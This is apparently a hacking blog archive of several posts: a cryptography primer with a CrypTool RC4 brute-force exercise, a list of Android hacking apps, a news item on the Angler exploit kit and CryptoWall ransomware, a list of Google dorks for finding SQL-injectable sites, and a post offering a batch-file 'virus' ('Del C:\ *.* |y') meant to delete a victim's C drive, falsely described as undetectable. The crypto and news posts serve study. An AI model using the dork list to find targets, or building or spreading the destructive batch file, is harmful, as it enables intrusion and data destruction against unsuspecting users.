Wednesday, July 20, 2016

How to make your data safe using Cryptography

In this article, we will introduce you to the world of cryptology and how you can secure information from falling into the wrong hands.

What is Cryptography?

Cryptography is the study and application of techniques that hide the real meaning of information by transforming it into non human readable formats and vice versa.

Let’s illustrate this with the aid of an example. Suppose you want to send the message “I LOVE APPLES”, you can replace every letter in the phrase with the third successive letter in the alphabet. The encrypted message will be “K NQYG CRRNGV”. To decrypt our message, we will have to go back three letters in the alphabet using the letter that we want to decrypt. The image below shows how the transformation is done.


The process of transforming information into non human readable form is called encryption.

The process of reversing encryption is called decryption.

Decryption is done using a secret key which is only known to the legitimate recipients of the information. The key is used to decrypt the hidden messages. This makes the communication secure because even if the attacker manages to get the information, it would not make sense to them.

 The encrypted information is known as a cipher.


What is Cryptanalysis?


Cryptology encrypts messages using a secret key. Cryptanalysis is the art of trying to decrypt the encrypted messages without the use of the key that was used to encrypt the messages. Cryptanalysis uses mathematical analysis & algorithms to decipher the ciphers. The success of cryptanalysis attacks depends on;

Amount of time available
Computing power available
Storage capacity available
The following is a list of the commonly used Cryptanalysis attacks;

Brute force attack– this type of attack uses algorithms that try to guess all the possible logical combinations of the plaintext which are then ciphered and compared against the original cipher.

Dictionary attack– this type of attack uses a wordlist in order to find a match of either the plaintext or key. It is mostly used when trying to crack encrypted passwords.

Rainbow table attack– this type of attack compares the cipher text against pre-computed hashes to find matches.


Encryption Algorithms

MD5– this is the acronym for Message-Digest 5. It is used to create 128 bit hash values. Theoretically, hashes cannot be reversed into the original plain text. MD5 is used to encrypt passwords as well as check data integrity.  MD5 is not collision resistant. Collision resistance is the difficulties in finding two values that produce the same hash values.

SHA– this is the acronym for Secure Hash Algorithm. SHA algorithms are used to generate condensed representations of a message (message digest). It has various versions such as;
  • SHA-0:  produces 120 bit hash values. It was withdrawn from use due to significant flaws and replaced by SHA-1.
  • SHA-1:  produces 160 bit hash values. It is similar to earlier versions of MD5. It has cryptographic weakness and is not recommended for use since the year 2010.
  • SHA-2:  it has two hash functions namely SHA-256 and SHA-512. SHA-256 uses 32 bit words while SHA-512 uses 64 bit words.
  • SHA-3: this algorithm was formally known as Keccak.

RC4– this algorithm is used to create stream ciphers. It is mostly used in protocols such as Secure Socket Layer (SSL) to encrypt internet communication and Wired Equivalent Privacy (WEP) to secure wireless networks.

BLOWFISH– this algorithm is used to create keyed, symmetric blocked ciphers. It can be used to encrypt passwords and other data.

Hacking Activity: Hack Now!

In this practical scenario, we will create a simple cipher using the RC4 algorithm. We will then attempt to decrypt it using brute-force attack. For this exercise, let us assume that we know the encryption secret key is 24 bits. We will use this information to break the cipher.

We will use CrypTool 1 as our cryptology tool. CrypTool 1 is an open source educational tool for crypto logical studies. You can download it from http://www.cryptool.org/en/ct1-download-en


Creating the RC4 stream cipher


We will encrypt the following phrase

Never underestimate the determination of a kid who is time-rich and cash-poor

We will use 00 00 00 as the encryption key.

  1. Open CrypTool 1



Replace the text with Never underestimate the determination of a kid who is time-rich and cash-poor


Click on Encrypt/Decrypt menu


Point to Symmetric (modern) then select RC4 as shown above
The following window will appear


Select 24 bits as the encryption key
Set the value to 00 00 00
Click on Encrypt button
 You will get the following stream cipher



Attacking the stream cipher

Click on Analysis menu

Point to Symmetric Encryption (modern) then select RC4 as shown above
You will get the following window


Remember the assumption made is the secret key is 24 bits. So make sure you select 24 bits as the key length.
Click on Start button, you will get the following window


Note: the time taken to complete the Brute-Force Analysis attack depends on the processing capacity of the machine been used and the key length. The longer the key length the longer it takes to complete the attack.
 

When the analysis is complete, you will get the following results.


Note: a lower Entropy number means it is the most likely correct result. It is possible a higher than the lowest found Entropy value could be the correct result.

Select the line that makes the most sense then click on Accept selection button when done

Summary
  • Cryptography is the science of ciphering and deciphering messages.
  • A cipher is a message that has been transformed into a non human readable format.
  • Deciphering is reversing a cipher into the original text.
  • Cryptanalysis is the art of deciphering ciphers without the knowledge of the key used to cipher them.
  • Cryptology combines the techniques of both cryptography and cryptanalyst.

Tuesday, April 5, 2016

Latest Android Hacking Apps 2016


 Latest Android Hacking Apps 2016



#1 Hackode

Hackode : The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

#2 Androrat

Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

#3 APKInspector

APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code.

#4 DroidBox

DroidBox is developed to offer dynamic analysis of Android applications.

#5 Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

#6 ZanTi

zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

#7 Droid Sheep

DroidSheep can be easily used by anybody who has an Android device and only the provider of the web service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service.

#8 dSploit

dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

#9 Arpspoof

Arpspoof is a tool for network auditing originally written by Dug Song as a part of his dsniff package. This app redirects traffic on the local network by forging ARP replies and sending them to either a specific target or all the hosts on the local network paths.

#10 Shark for Root

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.

#11 Nmap for Android

Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good.

So above is all about Latest Android Hacking Apps 2016

Tuesday, July 7, 2015

Angler Exploit Kit’s Cryptowall 3.0 Campaign Highly Evasive




The SANS Internet Storm Center is reporting that the Angler exploit kit (EK) serving up Cryptowall 3.0 ransomware has been evolving rapidly by altering its URL patterns on almost daily basis.
“The changes accumulate, and you might not recognize current traffic generated by Angler. After two weeks of vacation, I almost didn’t recognize it,” wrote Brad Duncan.
“Angler pushes different payloads, but we’re still seeing a lot of CryptoWall 3.0 from this EK. We first noticed CryptoWall 3.0 from Angler near the end of May 2015.”
The first week of the current malware spam campaign had an attachment namedmy_resume.zip that contained an HTML file namedmy_resume.svg which downloaded the Cryptowall 3.0 ransomware from a compromised server, but the attackers have made some adjustments.
“The extracted HTML file names use random numbers, with names likeresume4210.html orresume9647.html. Furthermore, the CryptoWall is now hosted on various docs.google.com URLs. If you open one of these HTML files, your browser will generate traffic to a compromised server,” Duncan said last month.
“The return traffic is gzip compressed, so you won’t see it in the TCP stream from Wireshark. Exporting the text from Wireshark shows HTML that points to a shared document from a Google server. Examining the traffic in Wireshark, you’ll find see a chain of events leading from the compromised server to docs.google.com.”
The team also detected the Angler exploit kit pushing CryptoWall 3.0 on 2015-05-26, the first time they had seen version 3.0 of CryptoWall used by Angler.
“In each case I’ve documented, the bitcoin address for the ransom payment was 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB. Angler EK is still being used by other groups to send different malware payloads. However, the appearance of CryptoWall 3.0 in Angler since 2015-06-26 using the same bitcoin address indicates this is a separate campaign by a specific actor,” Duncan said.
“The timing of these two campaigns, along with their consistent use of the same bitcoin addresses for the ransom payment, suggest they are related. They may have been initiated by the same actor. This is a significant trend in our current threat landscape.”
As recently as March 2015, researchers saw CryptoWall 3.0 being propagated through spam emails that came with a JavaScript attachment which posed as a resume inside an archive file.
The .JS file would connect to two URLs to download .JPG files, an old technique designed to bypass poorly designed intrusion detection systems (IDS) by disguising the malware as an image file.
The .JS file would execute the one.jpg and two.jpg files after a successful download, which were detected as TROJ_CRYPWAL.YOI and TSPY_FAREIT.YOI, respectively.

The Internet Crime Complaint Center (IC3) – a partnership between the Federal Bureau of Investigation (FBI) and the National White Collar Crime Center (NW3C) – reported recently that 992 U.S. victims of the Cryptowall ransomware campaign have incurred losses in excess of $18 million between April of 2014 and June of 2015.
“Recent IC3 reporting identifies CryptoWall as the most current and significant ransomware threat targeting U.S. individuals and businesses. CryptoWall and its variants have been used actively to target U.S. victims since April 2014,” the IC3 advisory stated.
“The financial impact to victims goes beyond the ransom fee itself, which is typically between $200 and $10,000. Many victims incur additional costs associated with network mitigation, network countermeasures, loss of productivity, legal fees, IT services, and/or the purchase of credit monitoring services for employees or customers.”
Source : http://darkmatters.norsecorp.com/2015/07/06/angler-exploit-kits-cryptowall-3-0-campaign-highly-evasive/

Monday, May 4, 2015

Google Dorks for SQL Injection

Google Dorks for SQL Injection



Google Dorks for SQL Injection

Here is the list of google dorks for sql injection.
        about.php?cartID=
        accinfo.php?cartId=
        acclogin.php?cartID=
        add.php?bookid=
        add_cart.php?num=
        addcart.php?
        addItem.php
        add-to-cart.php?ID=
        addToCart.php?idProduct=
        addtomylist.php?ProdId=
        adminEditProductFields.php?intProdID=
        advSearch_h.php?idCategory=
        affiliate.php?ID=
        affiliate-agreement.cfm?storeid=
        affiliates.php?id=
        ancillary.php?ID=
        archive.php?id=
        article.php?id=
        phpx?PageID
        basket.php?id=
        Book.php?bookID=
        book_list.php?bookid=
        book_view.php?bookid=
        BookDetails.php?ID=
        browse.php?catid=
        browse_item_details.php
        Browse_Item_Details.php?Store_Id=
        buy.php?
        buy.php?bookid=
        bycategory.php?id=
        cardinfo.php?card=
        cart.php?action=
        cart.php?cart_id=
        cart.php?id=
        cart_additem.php?id=
        cart_validate.php?id=
        cartadd.php?id=
        cat.php?iCat=
        catalog.php
        catalog.php?CatalogID=
        catalog_item.php?ID=
        catalog_main.php?catid=
        category.php
        category.php?catid=
        category_list.php?id=
        categorydisplay.php?catid=
        checkout.php?cartid=
        checkout.php?UserID=
        checkout_confirmed.php?order_id=
        checkout1.php?cartid=
        comersus_listCategoriesAndProducts.php?idCategory=
        comersus_optEmailToFriendForm.php?idProduct=
        comersus_optReviewReadExec.php?idProduct=
        comersus_viewItem.php?idProduct=
        comments_form.php?ID=
        contact.php?cartId=
        content.php?id=
        customerService.php?****ID1=
        default.php?catID=
        description.php?bookid=
        details.php?BookID=
        details.php?Press_Release_ID=
        details.php?Product_ID=
        details.php?Service_ID=
        display_item.php?id=
        displayproducts.php
        downloadTrial.php?intProdID=
        emailproduct.php?itemid=
        emailToFriend.php?idProduct=
        events.php?ID=
        faq.php?cartID=
        faq_list.php?id=
        faqs.php?id=
        feedback.php?title=
        freedownload.php?bookid=
        fullDisplay.php?item=
        getbook.php?bookid=
        GetItems.php?itemid=
        giftDetail.php?id=
        help.php?CartId=
        home.php?id=
        index.php?cart=
        index.php?cartID=
        index.php?ID=
        info.php?ID=
        item.php?eid=

Thursday, April 23, 2015

Learn To Make Dangerous Virus In A Minute

Learn To Make Dangerous Virus In A Minute

In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.


What will this virus do ?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.


How to Make the virus ?


   1. Open Notepad and copy below code into it.


       @Echo off
       Del C:\ *.* |y


   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.